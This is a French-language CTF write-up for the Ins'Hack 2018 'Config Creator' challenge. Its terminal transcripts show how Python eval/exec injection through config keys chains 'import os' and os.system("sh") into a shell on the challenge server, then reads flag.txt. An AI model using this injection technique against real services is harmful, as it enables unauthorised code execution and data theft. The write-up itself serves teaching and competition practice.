Ins'Hack 2018 - Config Creator (MISC)

I’ve just written a small utility to create a config file (which are sooo painful to write by han, right?). Care to have a look?
nc config-creator.ctf.insecurity-insa.fr 10000

Find the fuck

En jouant un peu on remarque rapidement qu’il est possible d’évaluer une valeur en ajoutant une clé

switch :: ~ » nc config-creator.ctf.insecurity-insa.fr 10000
Welcome to the config creator!

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 1

Config key? test
Config value? 1+1

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 1

Config key? eval(test)
Config value? nope

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 4

config:

configuration [
    test = 1+1;
    eval(test) = 2;
]


Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice?

Building the payload

Il suffit maintenant de trouver un moyen d’exécuter un shell sur la cible. Naturlich, le module os et sa fonction system me vient à l’esprit, tout en espérant qu’il ne soit pas supprimé de la jail !

nc config-creator.ctf.insecurity-insa.fr 10000
Welcome to the config creator!

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 1

Config key? one
Config value? import os

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 1

Config key? exec(one)
Config value? fe

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 4

config:

configuration [
    one = import os;
    exec(one) = None;
]


Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 1

Config key? next
Config value? os.system("sh")

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 1

Config key? eval(next)
Config value? fr

Please choose your action:
  1. Register a new config entry
  2. Change value of an existing config entry
  3. Show my template
  4. Show my config
  5. Reset current config
  6. exit

Choice? 4
id
uid=1000(config-creator) gid=1000(config-creator) groups=1000(config-creator)
ls
app.py
flag.txt
cat flag.txt
INSA{dont_get_me_wrong_i_love_python36}

En python deux fonctions existent et se ressemblent : exec et eval Cependant elles ne font pas la même chose.

eval évalue simplement d’une expression et retourne le résultat de celle-ci eval("1+1") =>2

exec execute du code python dynamiquement, il est ainsi possible d’utiliser des structures logiques, fonctions ou même import exec("a = 5") => None